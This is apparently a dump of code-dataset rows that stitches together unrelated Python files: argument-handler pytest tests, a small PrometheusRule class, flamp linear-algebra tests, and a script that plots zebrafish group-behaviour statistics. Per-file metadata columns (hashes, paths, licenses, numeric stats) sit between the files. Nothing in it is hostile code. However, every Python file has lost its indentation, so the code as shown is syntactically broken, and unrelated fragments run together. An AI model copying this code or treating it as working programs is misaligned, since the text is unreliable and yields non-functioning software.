out = args._convert("foo", None, allowed=["FOO", "BAR", "BAZ"], map_fct="upper")
assert out is None
# check default convert
out = args._convert("foo", None, default=True, map_fct=strtobool)
assert out is True
# test error cases
with pytest.raises(ArgError):
out = args._convert("foo", None, required=True)
with pytest.raises(ArgError):
out = args._convert("foo", "bar", allowed=["foo", "baz"])
def test_arghandler_params():
'''Ensure that we can parse arguments from url query params'''
req = HttpRequest("GET", "foo/bar", params={"foo": "1", "bar": "true", "baz": "opt1"}, body=None)
args = RequestArgHandler(req)
# handle requests
out = args.get_query("foo")
assert out == "1"
out = args.get_query("foo", map_fct=int)
assert out == 1
out = args.get_query("bar", map_fct="bool")
assert out is True
out = args.get_query("baz")
assert out == "opt1"
out = args.get_query("baz", allowed=["opt1", "opt2"])
assert out == "opt1"
with pytest.raises(ArgError):
out = args.get_query("baz", allowed=["opt3", "opt2"])
out = args.get_query("not_there")
assert out is None
out = args.get_query("not_there", default=True)
assert out is True
def test_arghandler_body():
'''Ensure that we can parse arguments from request body'''
req = HttpRequest("GET", "foo/bar", body=json.dumps({"foo": "1", "bar": "true", "baz": "opt1"}).encode("utf-8"))
args = RequestArgHandler(req)
# handle requests
out = args.get_body("foo")
assert out == "1"
out = args.get_body("foo", map_fct=int)
assert out == 1
out = args.get_body("bar", map_fct="bool")
assert out is True
out = args.get_body("baz")
assert out == "opt1"
out = args.get_body("baz", allowed=["opt1", "opt2"])
assert out == "opt1"
with pytest.raises(ArgError):
out = args.get_body("baz", allowed=["opt3", "opt2"])
out = args.get_body("not_there")
assert out is None
out = args.get_body("not_there", default=True)
assert out is True
def test_arghandler_querybody():
'''Ensure that we can parse arguments in combined fashion'''
# split parameters and test all extrems
req3 = HttpRequest("GET", "foo/bar", params={"foo": "1", "bar": "true"}, body=json.dumps({"baz": "opt1"}).encode("utf-8"))
req2 = HttpRequest("GET", "foo/bar", body=json.dumps({"foo": "1", "bar": "true", "baz": "opt1"}).encode("utf-8"))
req1 = HttpRequest("GET", "foo/bar", params={"foo": "1", "bar": "true", "baz": "opt1"}, body=None)
# iterate through different request types
for req in [req1, req2, req3]:
args = RequestArgHandler(req)
# handle requests
out = args.get_body_query("foo")
assert out == "1"
out = args.get_body_query("foo", map_fct=int)
assert out == 1
out = args.get_body_query("bar", map_fct="bool")
assert out is True
out = args.get_body_query("baz")
assert out == "opt1"
out = args.get_body_query("baz", allowed=["opt1", "opt2"])
assert out == "opt1"
with pytest.raises(ArgError):
out = args.get_body_query("baz", allowed=["opt3", "opt2"])
out = args.get_body_query("not_there")
assert out is None
out = args.get_body_query("not_there", default=True)
assert out is True
def test_arghandler_route():
'''Ensure that we can parse arguments from request body'''
req = HttpRequest("GET", "foo/bar", route_params={"area": "foo"}, body=None)
args = RequestArgHandler(req)
# handle requests
out = args.get_route("area")
assert out == "foo"
out = args.get_route("area", required=True)
assert out == "foo"
out = args.get_route("area", required=True, allowed=["foo", "bar"])
assert out == "foo"
out = args.get_route("section", default="bar")
assert out == "bar"
with pytest.raises(ArgError):
out = args.get_route("area", allowed=["bar", "baz"])
out = args.get_route("not_there")
assert out is None
out = args.get_route("not_there", default=True)
assert out is True
| 33.575581
| 126
| 0.621991
| 796
| 5,775
| 4.398241
| 0.128141
| 0.093973
| 0.088546
| 0.077692
| 0.806341
| 0.792059
| 0.758926
| 0.718081
| 0.573836
| 0.447015
| 0
| 0.009469
| 0.21368
| 5,775
| 172
| 127
| 33.575581
| 0.761506
| 0.092987
| 0
| 0.420168
| 0
| 0
| 0.119377
| 0
| 0
| 0
| 0
| 0
| 0.344538
| 1
| 0.042017
| false
| 0
| 0.067227
| 0
| 0.109244
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
409c8388e6241ac0e2526c76e6ac7f92f79a225d
| 179
|
py
|
Python
|
ocp_resources/prometheus_rule.py
|
kbidarkar/openshift-python-wrapper
|
3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb
|
[
"Apache-2.0"
] | null | null | null |
ocp_resources/prometheus_rule.py
|
kbidarkar/openshift-python-wrapper
|
3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb
|
[
"Apache-2.0"
] | null | null | null |
ocp_resources/prometheus_rule.py
|
kbidarkar/openshift-python-wrapper
|
3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb
|
[
"Apache-2.0"
] | null | null | null |
from ocp_resources.resource import Resource
class PrometheusRule(Resource):
"""
Prometheus Rule object.
"""
api_group = Resource.ApiGroup.MONITORING_COREOS_COM
| 17.9
| 55
| 0.73743
| 19
| 179
| 6.736842
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.184358
| 179
| 9
| 56
| 19.888889
| 0.876712
| 0.128492
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
40a6afd61732ef0cbfb1b41a760a5a122f098c7d
| 8,329
|
py
|
Python
|
test/test_flamp.py
|
c-f-h/flamp
|
415ca618f95831fe18d4dc0cb83d9f8ef2edd4d8
|
[
"BSD-2-Clause"
] | null | null | null |
test/test_flamp.py
|
c-f-h/flamp
|
415ca618f95831fe18d4dc0cb83d9f8ef2edd4d8
|
[
"BSD-2-Clause"
] | null | null | null |
test/test_flamp.py
|
c-f-h/flamp
|
415ca618f95831fe18d4dc0cb83d9f8ef2edd4d8
|
[
"BSD-2-Clause"
] | null | null | null |
import numpy as np
import gmpy2
from gmpy2 import mpfr, mpc
import flamp
def to_fp(A):
return np.array(A, float)
def to_cpx(A):
return np.array(A, complex)
### linalg
def test_qr_real():
n = 5
A = np.random.rand(n, n)
AA = mpfr(1) * A
Q, R = flamp.qr(AA)
assert Q.shape == (n, n) and R.shape == (n, n)
assert np.allclose(to_fp(Q.T @ Q), np.eye(n))
assert np.allclose(to_fp(Q @ R), A)
assert np.all(np.tril(R, -1) == 0)
## special case: size 0 matrix
AA = flamp.zeros((4, 0))
Q, R = flamp.qr(AA)
assert np.allclose(to_fp(Q), np.eye(4))
assert R.shape == (4, 0)
def test_qr_complex():
n = 5
A = np.random.rand(n, n) + 1j * np.random.rand(n, n)
AA = mpfr(1) * A
Q, R = flamp.qr(AA)
assert Q.shape == (n, n) and R.shape == (n, n)
assert np.allclose(to_cpx(Q.T.conj() @ Q), np.eye(n))
assert np.allclose(to_cpx(Q @ R), A)
assert np.all(np.tril(R, -1) == 0)
def test_inverse_real():
n = 5
A = np.random.rand(n, n)
AA = mpfr(1) * A
Ainv = flamp.inverse(AA)
assert A.shape == (n, n)
assert np.allclose(to_fp(Ainv @ A), np.eye(n))
def test_inverse_complex():
n = 5
A = np.random.rand(n, n) + 1j * np.random.rand(n, n)
AA = mpfr(1) * A
Ainv = flamp.inverse(AA)
assert A.shape == (n, n)
assert np.allclose(to_cpx(Ainv @ A), np.eye(n))
def test_lu_solve_real():
n = 5
A, b = np.random.rand(n, n), np.random.rand(n)
AA = mpfr(1) * A
x = flamp.lu_solve(AA, b)
assert x.shape == (n,)
assert np.allclose(to_fp(A @ x), b)
def test_lu_solve_real_block():
n = 5
A, b = np.random.rand(n, n), np.random.rand(n, 3)
AA = mpfr(1) * A
x = flamp.lu_solve(AA, b)
assert x.shape == (n, 3)
assert np.allclose(to_fp(A @ x), b)
def test_lu_solve_complex():
n = 5
A, b = np.random.rand(n, n) + 1j * np.random.rand(n, n), np.random.rand(n)
AA = mpfr(1) * A
x = flamp.lu_solve(AA, b)
assert x.shape == (n,)
assert np.allclose(to_cpx(A @ x), b)
def test_lu():
n = 5
A = np.random.rand(n, n) + 1j * np.random.rand(n, n)
AA = mpfr(1) * A
P, L, U = flamp.lu(AA)
assert np.allclose(to_cpx(P @ AA), to_cpx(L @ U))
def test_cholesky_solve_real():
n = 5
A, b = np.random.rand(n, n), np.random.rand(n)
A = A.T @ A
AA = mpfr(1) * A
x = flamp.cholesky_solve(AA, b)
assert x.shape == (n,)
assert np.allclose(to_fp(A @ x), b)
def test_cholesky_solve_real_block():
n = 5
A, b = np.random.rand(n, n), np.random.rand(n, 3)
A = A.T @ A
AA = mpfr(1) * A
x = flamp.cholesky_solve(AA, b)
assert x.shape == (n, 3)
assert np.allclose(to_fp(A @ x), b)
def test_qr_solve_real():
n = 5
A, b = np.random.rand(n, n), np.random.rand(n)
AA = mpfr(1) * A
x = flamp.qr_solve(AA, b)
assert x.shape == (n,)
assert np.allclose(to_fp(A @ x), b)
def test_qr_solve_real_block():
n = 5
A, b = np.random.rand(n, n), np.random.rand(n, 3)
AA = mpfr(1) * A
x = flamp.qr_solve(AA, b)
assert x.shape == (n, 3)
assert np.allclose(to_fp(A @ x), b)
def test_solve_real_overdet():
n = 5
A, b = np.random.rand(n + 2, n), np.random.rand(n + 2, 3)
AA = mpfr(1) * A
x = flamp.qr_solve(AA, b)
x2 = flamp.lu_solve(AA, b)
assert x.shape == (n, 3)
assert x2.shape == (n, 3)
assert np.allclose(to_fp(x), to_fp(x2))
def test_det():
n = 5
E = np.random.rand(n) # random eigenvalues
U = mpfr(1) * np.random.rand(n, n)
Uinv = flamp.inverse(U)
A = U @ np.diag(E) @ Uinv
det = flamp.det(A)
assert np.allclose(to_fp(det), np.prod(E))
### eigen
def test_eig_real():
A = mpfr(1) * np.arange(9).reshape((3, 3))
E, UL, UR = flamp.eig(A, left=True, right=True)
assert np.allclose(to_cpx(A @ UR), to_cpx(E[None, :] * UR))
assert np.allclose(to_cpx(UL @ A), to_cpx(E[:, None] * UL))
# compute only eigenvalues
E2 = flamp.eig(A, left=False, right=False)
assert np.all(E == E2)
def test_eig_complex():
A = mpfr(1) * (np.random.rand(5, 5) + 1j * np.random.rand(5, 5))
E, UL, UR = flamp.eig(A, left=True, right=True)
assert np.allclose(to_cpx(A @ UR), to_cpx(E[None, :] * UR))
assert np.allclose(to_cpx(UL @ A), to_cpx(E[:, None] * UL))
# compute only eigenvalues
E2 = flamp.eig(A, left=False, right=False)
assert np.all(E == E2)
def test_hessenberg_real():
n = 5
A = np.random.rand(n, n)
AA = mpfr(1) * A
Q, H = flamp.hessenberg(AA)
assert Q.shape == (n, n) and H.shape == (n, n)
assert np.allclose(to_fp(Q.T @ Q), np.eye(n))
assert np.allclose(to_fp(Q @ H @ Q.T), A)
assert np.all(np.tril(H, -2) == 0)
def test_hessenberg_complex():
n = 5
A = np.random.rand(n, n) + 1j * np.random.rand(n, n)
AA = mpfr(1) * A
Q, H = flamp.hessenberg(AA)
assert Q.shape == (n, n) and H.shape == (n, n)
assert np.allclose(to_cpx(Q.T.conj() @ Q), np.eye(n))
assert np.allclose(to_cpx(Q @ H @ Q.T.conj()), A)
assert np.all(np.tril(H, -2) == 0)
def test_schur():
n = 5
A = np.random.rand(n, n) + 1j * np.random.rand(n, n)
AA = mpfr(1) * A
Q, R = flamp.schur(AA)
assert Q.shape == (n, n) and R.shape == (n, n)
assert np.allclose(to_cpx(Q.T.conj() @ Q), np.eye(n))
assert np.allclose(to_cpx(Q @ R @ Q.T.conj()), A)
assert np.all(np.tril(R, -1) == 0)
### eigen_symmetric
def test_eigh_real():
n = 5
A = np.random.rand(n, n)
A = A + A.T
AA = mpfr(1) * A
E, Q = flamp.eigh(AA)
assert np.allclose(to_fp(Q.T @ Q), np.eye(n))
assert E.shape == (n,)
assert np.allclose(to_fp(Q @ np.diag(E) @ Q.T), A)
# compute only eigenvalues
E2 = flamp.eigh(AA, eigvals_only=True)
assert np.all(E == E2)
def test_eigh_complex():
n = 5
A = np.random.rand(n, n) + 1j * np.random.rand(n, n)
A = A + A.T.conj()
AA = mpfr(1) * A
E, Q = flamp.eigh(AA)
assert np.allclose(to_cpx(Q.T.conj() @ Q), np.eye(n))
assert E.shape == (n,)
assert np.allclose(to_cpx(Q @ np.diag(E) @ Q.T.conj()), A)
# compute only eigenvalues
E2 = flamp.eigh(AA, eigvals_only=True)
assert np.all(E == E2)
def test_svd_real():
n = 5
A = np.random.rand(n, n)
AA = mpfr(1) * A
U, S, V = flamp.svd(AA)
assert np.allclose(to_fp(U.T @ U), np.eye(n))
assert np.allclose(to_fp(V.T @ V), np.eye(n))
assert S.shape == (n,)
assert np.allclose(to_fp((U * S[None, :]) @ V), A)
# compute only singular values
S2 = flamp.svd(AA, compute_uv=False)
assert np.all(S == S2)
def test_svd_complex():
n = 5
A = np.random.rand(n, n) + 1j * np.random.rand(n, n)
AA = mpfr(1) * A
U, S, V = flamp.svd(AA)
assert np.allclose(to_cpx(U.T.conj() @ U), np.eye(n))
assert np.allclose(to_cpx(V.T.conj() @ V), np.eye(n))
assert S.shape == (n,)
assert np.allclose(to_cpx((U * S[None, :]) @ V), A)
# compute only singular values
S2 = flamp.svd(AA, compute_uv=False)
assert np.all(S == S2)
### eigen internals
import flamp.eigen
def test_hessenberg_qr():
A = np.triu(np.ones((3, 3)), -1)
AA = gmpy2.mpfr(1) * A
Q = flamp.eye(3)
flamp.eigen.hessenberg_qr(gmpy2, AA, Q)
assert np.allclose(to_fp(Q.T @ Q), np.eye(3))
assert np.allclose(to_fp(Q @ AA @ Q.T), A)
def test_eig_tr_r():
R = np.triu(np.ones((3, 3)))
U = flamp.eigen.eig_tr_r(gmpy2, gmpy2.mpfr(1) * R)
assert np.allclose(to_fp(U), [[1, -1, 1], [0, 0, 0], [0, 0, 0]])
### utility
def test_prec():
assert flamp.get_precision() == 53
assert flamp.get_dps() == 15
with flamp.extraprec(336 - flamp.get_precision()):
assert flamp.get_precision() == 336
assert flamp.get_dps() == 100
flamp.set_precision(88)
assert flamp.get_precision() == 88
flamp.set_dps(54)
assert flamp.get_dps() == 54
def test_to_mp():
x = flamp.to_mp([3.4, 5.6])
assert x.shape == (2,) and x.dtype == 'O' and np.allclose(to_fp(x), [3.4, 5.6])
x = flamp.to_mp(np.arange(10))
assert x.shape == (10,) and x.dtype == 'O' and x[4] == 4
def test_linspace():
x = flamp.linspace(3, 5, 17)
assert np.allclose(to_fp(x), np.linspace(3, 5, 17))
x = flamp.linspace(4.5, -3.8, 7, endpoint=False)
assert np.allclose(to_fp(x), np.linspace(4.5, -3.8, 7, endpoint=False))
| 29.122378
| 83
| 0.568856
| 1,563
| 8,329
| 2.940499
| 0.079335
| 0.092254
| 0.112272
| 0.164491
| 0.784378
| 0.743037
| 0.712794
| 0.695822
| 0.650131
| 0.63577
| 0
| 0.028504
| 0.241806
| 8,329
| 285
| 84
| 29.224561
| 0.699287
| 0.030856
| 0
| 0.574468
| 0
| 0
| 0.000249
| 0
| 0
| 0
| 0
| 0
| 0.348936
| 1
| 0.12766
| false
| 0
| 0.021277
| 0.008511
| 0.157447
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
40cfaa64c8c89aced37ef2f6cefe394a75d41fcd
| 10,674
|
py
|
Python
|
armin_analysis/figure3_make_figure.py
|
arminbahl/mutant_zebrafish_behavior
|
17bee04b35c23b0f93fcecac9758e6ba19872be1
|
[
"MIT"
] | null | null | null |
armin_analysis/figure3_make_figure.py
|
arminbahl/mutant_zebrafish_behavior
|
17bee04b35c23b0f93fcecac9758e6ba19872be1
|
[
"MIT"
] | null | null | null |
armin_analysis/figure3_make_figure.py
|
arminbahl/mutant_zebrafish_behavior
|
17bee04b35c23b0f93fcecac9758e6ba19872be1
|
[
"MIT"
] | null | null | null |
from pathlib import Path
import numpy as np
from fit_integrator_model import get_model_result, get_target_result
import my_figure as myfig
import matplotlib
import pandas as pd
import pylab as pl
from scipy.stats import sem
# Do a bootstrap (permutation-style) test on the group medians
def bootstrap(vals1, vals2):
    """Two-sided bootstrap test for a difference in medians.

    Pools both samples, then repeatedly draws two resamples of 12 (the
    group size used throughout this figure) with replacement to build the
    null distribution of median differences.

    Arguments:
        vals1, vals2: 1-D array-likes of per-group measurements.

    Returns:
        (p, stars): the p-value and a significance label out of
        "***" (p < 0.001), "**" (p < 0.01), "*" (p < 0.05), "ns".
    """
    combined = np.r_[vals1, vals2]
    # Null distribution of median differences between two random
    # resamples of the pooled data (vectorized: 10000 x 12 draws).
    resamples1 = np.random.choice(combined, (10000, 12))
    resamples2 = np.random.choice(combined, (10000, 12))
    ds = np.median(resamples1, axis=1) - np.median(resamples2, axis=1)
    d_real = np.abs(np.median(vals1) - np.median(vals2))
    # BUGFIX: the observed statistic d_real is an absolute difference, so
    # the null differences must be compared in absolute value too.  The
    # original `(ds > d_real)` counted only the positive tail and thus
    # roughly halved the two-sided p-value.
    p = (np.abs(ds) > d_real).sum() / len(ds)
    print(p)
    if p < 0.001:
        stars = "***"
    elif p < 0.01:
        stars = "**"
    elif p < 0.05:
        stars = "*"
    else:
        stars = "ns"
    return p, stars
# Data locations (hard-coded to the original analysis machine).
root_path = Path("/Users/arminbahl/Desktop/mutant_behavior_data/dot_motion_coherence")
target_path = Path("/Users/arminbahl/Dropbox/pandas_data_for_ariel/paper/figures")
# Raw sampling step in seconds; the high-resolution traces are decimated
# 10x below, so `time` has one point every 0.1 s over a 120 s trial.
dt = 0.01
time = np.arange(0, 12000*dt, dt)[::10]
# Low-resolution time base (1 s bins) used for the speed traces.
time_lowrest = np.arange(0, 119, 1)
# Chance levels drawn as horizontal reference lines; the /100 presumably
# converts mm -> cm to match the distance traces -- TODO confirm units.
chance_distance = 534.361450802352 / 100
chance_polarization = 0.3169689901297303
# One mutant line color per experiment column (wildtype is always black).
colors = ["C3", "red", "C4"]
# Build one multi-panel figure per age group.  Each figure has three
# experiment columns and three measures -- swim speed, group spacing, and
# polarization -- each shown as a time course (panels a-c) plus a
# wildtype-vs-mutant summary/statistics panel on the right.
for age in [7, 14, 21]:
    fig = myfig.Figure(title=f"Figure 3")
    for i, experiment in enumerate(["scn1lab_NIBR_20200708", "scn1lab_zirc_20200710", "disc1_hetinx"]):
        # Wildtype data: polarization/spacing traces are decimated 10x to
        # match `time`; the /100 presumably converts mm -> cm -- TODO
        # confirm units against the recording pipeline.
        polarizations_wt = np.load(root_path / experiment / f"polarizations_wt_age{age}dpf.npy")[:,::10]
        neighbor_distances_wt = np.load(root_path / experiment / f"neighbor_distances_wt_age{age}dpf.npy")[:,::10] / 100
        speed_over_time_wt = np.load(root_path / experiment / f"speed_over_time_wt_age{age}dpf.npy")[:, :] / 100

        # The "mutant" group is the heterozygotes for the two scn1lab
        # lines and the homozygotes for disc1_hetinx.
        if experiment == "scn1lab_NIBR_20200708" or experiment == "scn1lab_zirc_20200710":
            polarizations_mutant = np.load(root_path / experiment / f"polarizations_het_age{age}dpf.npy")[:,::10]
            neighbor_distances_mutant = np.load(root_path / experiment / f"neighbor_distances_het_age{age}dpf.npy")[:, ::10] / 100
            speed_over_time_mutant = np.load(root_path / experiment / f"speed_over_time_het_age{age}dpf.npy")[:, :] / 100
        if experiment == "disc1_hetinx":
            polarizations_mutant = np.load(root_path / experiment / f"polarizations_hom_age{age}dpf.npy")[:,::10]
            neighbor_distances_mutant = np.load(root_path / experiment / f"neighbor_distances_hom_age{age}dpf.npy")[:, ::10] / 100
            speed_over_time_mutant = np.load(root_path / experiment / f"speed_over_time_hom_age{age}dpf.npy")[:, :] / 100

        # Speed over time: individual groups as thin lines, mean +/- sem
        # on top.  The gray vspan marks the 20-100 s stimulus period.
        p0 = myfig.Plot(fig, num='a' if i == 0 else '', xpos=3 + i * 2, ypos=15, plot_height=1.25, plot_width=1.5, title = experiment,
                        lw=1, pc='white', errorbar_area=True, hlines=[0],
                        xmin=-1, xmax=121, xticks=[0, 30, 60, 90, 120], xticklabels = [""]*5,
                        yl="Speed (cm/s)" if i == 0 else None, ymin=-0.1, ymax=0.51, yticks=[0, 0.25, 0.5] if i == 0 else None,
                        vspans=[[20, 100, "lightgray", 0.6]])
        for j in range(12):
            myfig.Line(p0, x=time_lowrest, y=speed_over_time_wt[j], lc="black", zorder=1, lw=0.25, alpha=0.25)
            myfig.Line(p0, x=time_lowrest, y=speed_over_time_mutant[j], lc=colors[i], zorder=1, lw=0.25, alpha=0.25)
        myfig.Line(p0, x=time_lowrest, y=np.mean(speed_over_time_wt, axis=0), yerr=sem(speed_over_time_wt, axis=0), lc="black", zorder=2, label="Wildtype" if i == 2 else None)
        myfig.Line(p0, x=time_lowrest, y=np.mean(speed_over_time_mutant, axis=0), yerr=sem(speed_over_time_mutant, axis=0), lc=colors[i], zorder=2, label="Mutant" if i == 2 else None)

        # Group spacing over time.
        p0 = myfig.Plot(fig, num='b' if i == 0 else '', xpos=3 + i * 2, ypos=13, plot_height=1.25, plot_width=1.5, title = "",
                        lw=1, pc='white', errorbar_area=True, hlines=[chance_distance],
                        xmin=-1, xmax=121, xticks=[0, 30, 60, 90, 120], xticklabels = [""]*5,
                        yl="Group spacing (cm)" if i == 0 else '', ymin=-1, ymax=11, yticks=[0, 5, 10] if i == 0 else None,
                        vspans=[[20, 100, "lightgray", 0.6]])
        for j in range(12):
            myfig.Line(p0, x=time, y=neighbor_distances_wt[j], lc="black", zorder=1, lw=0.25, alpha=0.25)
            myfig.Line(p0, x=time, y=neighbor_distances_mutant[j], lc=colors[i], zorder=1, lw=0.25, alpha=0.25)
        myfig.Line(p0, x=time, y=np.mean(neighbor_distances_wt, axis=0), yerr=sem(neighbor_distances_wt, axis=0), lc="black", zorder=2)
        myfig.Line(p0, x=time, y=np.mean(neighbor_distances_mutant, axis=0), yerr=sem(neighbor_distances_mutant, axis=0), lc=colors[i], zorder=2)

        # Polarization over time.
        p0 = myfig.Plot(fig, num='c' if i == 0 else '', xpos=3 + i * 2, ypos=11, plot_height=1.25, plot_width=1.5,
                        lw=1, pc='white', errorbar_area=True, hlines=[chance_polarization],
                        xl = "Time (s)", xmin=-1, xmax=121, xticks=[0, 30, 60, 90, 120],
                        yl="Polarization" if i == 0 else None, ymin=0.15, ymax=0.7, yticks=[0.2, 0.4, 0.6] if i == 0 else None,
                        vspans=[[20, 100, "lightgray", 0.6]])
        for j in range(12):
            myfig.Line(p0, x=time, y=polarizations_wt[j], lc="black", zorder=1, lw=0.25, alpha=0.25)
            myfig.Line(p0, x=time, y=polarizations_mutant[j], lc=colors[i], zorder=1, lw=0.25, alpha=0.25)
        myfig.Line(p0, x=time, y=np.mean(polarizations_wt, axis=0), yerr=sem(polarizations_wt, axis=0), lc="black", zorder=2)
        myfig.Line(p0, x=time, y=np.mean(polarizations_mutant, axis=0), yerr=sem(polarizations_mutant, axis=0), lc=colors[i], zorder=2)

        ### Speed stats: per-group means over the 80-100 s window of the
        ### 1 s-binned speed traces (small dots: groups; big dot: median).
        p0 = myfig.Plot(fig, num='', xpos=12.0 + i * 1, ypos=15, plot_height=0.75, plot_width=0.5,
                        lw=1, pc='white', errorbar_area=False, hlines=[0],
                        xl="", xmin=-0.5, xmax=1.5, xticks=[0, 1],
                        yl="Speed (cm/s)" if i == 0 else None, ymin=-0.1, ymax=0.51, yticks=[0, 0.25, 0.5] if i == 0 else None)
        myfig.Scatter(p0, x=[0]*12, y=np.nanmean(speed_over_time_wt[:, int(80):int(100)], axis=1),
                      lc='black', pt='o',
                      lw=0.5, ps=5, pc='white', zorder=2, alpha=0.5)
        myfig.Scatter(p0, x=[0], y=np.median(np.nanmean(speed_over_time_wt[:, int(80):int(100)], axis=1)),
                      lc='black', pt='o',
                      lw=1, ps=10, pc='white', zorder=2)
        myfig.Scatter(p0, x=[1] * 12, y=np.nanmean(speed_over_time_mutant[:, int(80):int(100)], axis=1),
                      lc=colors[i], pt='o',
                      lw=0.5, ps=5, pc='white', zorder=2, alpha=0.5)
        myfig.Scatter(p0, x=[1], y=np.median(np.nanmean(speed_over_time_mutant[:, int(80):int(100)], axis=1)),
                      lc=colors[i], pt='o',
                      lw=1, ps=10, pc='white', zorder=2)
        # BUGFIX: the wildtype sample previously used the 20..80 window
        # while the mutant sample used 80..100; every other comparison in
        # this figure (including the scatter dots above) uses the same
        # 80..100 window for both groups.
        p, stars = bootstrap(np.nanmean(speed_over_time_wt[:, int(80):int(100)], axis=1), np.nanmean(speed_over_time_mutant[:, int(80):int(100)], axis=1))
        myfig.Line(p0, x=[0, 1], y=[0.48, 0.48], lc='black', lw=0.75)
        myfig.Text(p0, x=0.5, y=0.5, text=stars)

        ### Spacing stats: same 80-100 s window; these traces are sampled
        ### every 0.1 s, hence the /0.1 index conversion.
        p0 = myfig.Plot(fig, num='', xpos=12.0 + i * 1, ypos=13, plot_height=0.75, plot_width=0.5,
                        lw=1, pc='white', errorbar_area=False,
                        xl="", xmin=-0.5, xmax=1.5, xticks=[0, 1], hlines=[chance_distance],
                        yl="Group spacing (cm)" if i == 0 else None, ymin=-1, ymax=11, yticks=[0, 5, 10] if i == 0 else None)
        myfig.Scatter(p0, x=[0]*12, y=np.nanmean(neighbor_distances_wt[:, int(80/0.1):int(100/0.1)], axis=1),
                      lc='black', pt='o',
                      lw=0.5, ps=5, pc='white', zorder=2, alpha=0.5)
        myfig.Scatter(p0, x=[0], y=np.median(np.nanmean(neighbor_distances_wt[:, int(80/0.1):int(100/0.1)], axis=1)),
                      lc='black', pt='o',
                      lw=1, ps=10, pc='white', zorder=2)
        myfig.Scatter(p0, x=[1] * 12, y=np.nanmean(neighbor_distances_mutant[:, int(80/0.1):int(100/0.1)], axis=1),
                      lc=colors[i], pt='o',
                      lw=0.5, ps=5, pc='white', zorder=2, alpha=0.5)
        myfig.Scatter(p0, x=[1], y=np.median(np.nanmean(neighbor_distances_mutant[:, int(80/0.1):int(100/0.1)], axis=1)),
                      lc=colors[i], pt='o',
                      lw=1, ps=10, pc='white', zorder=2)
        p, stars = bootstrap(np.nanmean(neighbor_distances_wt[:, int(80/0.1):int(100/0.1)], axis=1), np.nanmean(neighbor_distances_mutant[:, int(80/0.1):int(100/0.1)], axis=1))
        myfig.Line(p0, x=[0, 1], y=[8, 8], lc='black', lw=0.75)
        myfig.Text(p0, x=0.5, y=8.5, text=stars)

        ### Polarization stats (same 80-100 s window).
        p0 = myfig.Plot(fig, num='', xpos=12.0 + i * 1, ypos=11, plot_height=0.75, plot_width=0.5,
                        lw=1, pc='white', errorbar_area=False, hlines=[chance_polarization],
                        xl="", xmin=-0.5, xmax=1.5, xticks=[0, 1],
                        yl="Polarization" if i == 0 else None, ymin=0.15, ymax=0.7, yticks=[0.2, 0.4, 0.6] if i == 0 else None)
        myfig.Scatter(p0, x=[0]*12, y=np.nanmean(polarizations_wt[:, int(80/0.1):int(100/0.1)], axis=1),
                      lc='black', pt='o',
                      lw=0.5, ps=5, pc='white', zorder=2, alpha=0.5)
        myfig.Scatter(p0, x=[0], y=np.median(np.nanmean(polarizations_wt[:, int(80/0.1):int(100/0.1)], axis=1)),
                      lc='black', pt='o',
                      lw=1, ps=10, pc='white', zorder=2)
        myfig.Scatter(p0, x=[1] * 12, y=np.nanmean(polarizations_mutant[:, int(80/0.1):int(100/0.1)], axis=1),
                      lc=colors[i], pt='o',
                      lw=0.5, ps=5, pc='white', zorder=2, alpha=0.5)
        myfig.Scatter(p0, x=[1], y=np.median(np.nanmean(polarizations_mutant[:, int(80/0.1):int(100/0.1)], axis=1)),
                      lc=colors[i], pt='o',
                      lw=1, ps=10, pc='white', zorder=2)
        p, stars = bootstrap(np.nanmean(polarizations_wt[:, int(80/0.1):int(100/0.1)], axis=1),
                             np.nanmean(polarizations_mutant[:, int(80/0.1):int(100/0.1)], axis=1))
        myfig.Line(p0, x=[0, 1], y=[0.6, 0.6], lc='black', lw=0.75)
        myfig.Text(p0, x=0.5, y=0.7, text=stars)

    # One PDF per age group.
    fig.savepdf(target_path / f"raw_figure3_age{age}dpf", open_pdf=True)
| 55.59375
| 183
| 0.55771
| 1,716
| 10,674
| 3.359557
| 0.118298
| 0.011101
| 0.04059
| 0.020815
| 0.804683
| 0.776236
| 0.761318
| 0.707892
| 0.662966
| 0.593755
| 0
| 0.096149
| 0.260446
| 10,674
| 191
| 184
| 55.884817
| 0.634153
| 0.008994
| 0
| 0.248175
| 0
| 0
| 0.085952
| 0.051874
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007299
| false
| 0
| 0.058394
| 0
| 0.072993
| 0.007299
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
dc0c9f144e4bffe73f5084a129cb6af532ae3711
| 903
|
py
|
Python
|
tests/test_codeblock.py
|
koaning/mktestdocs
|
96bfc7e43cf6d14053db215b183ba68d9df6c616
|
[
"Apache-2.0"
] | 49
|
2020-12-02T15:47:47.000Z
|
2022-03-18T15:04:25.000Z
|
tests/test_codeblock.py
|
koaning/mktestdocs
|
96bfc7e43cf6d14053db215b183ba68d9df6c616
|
[
"Apache-2.0"
] | null | null | null |
tests/test_codeblock.py
|
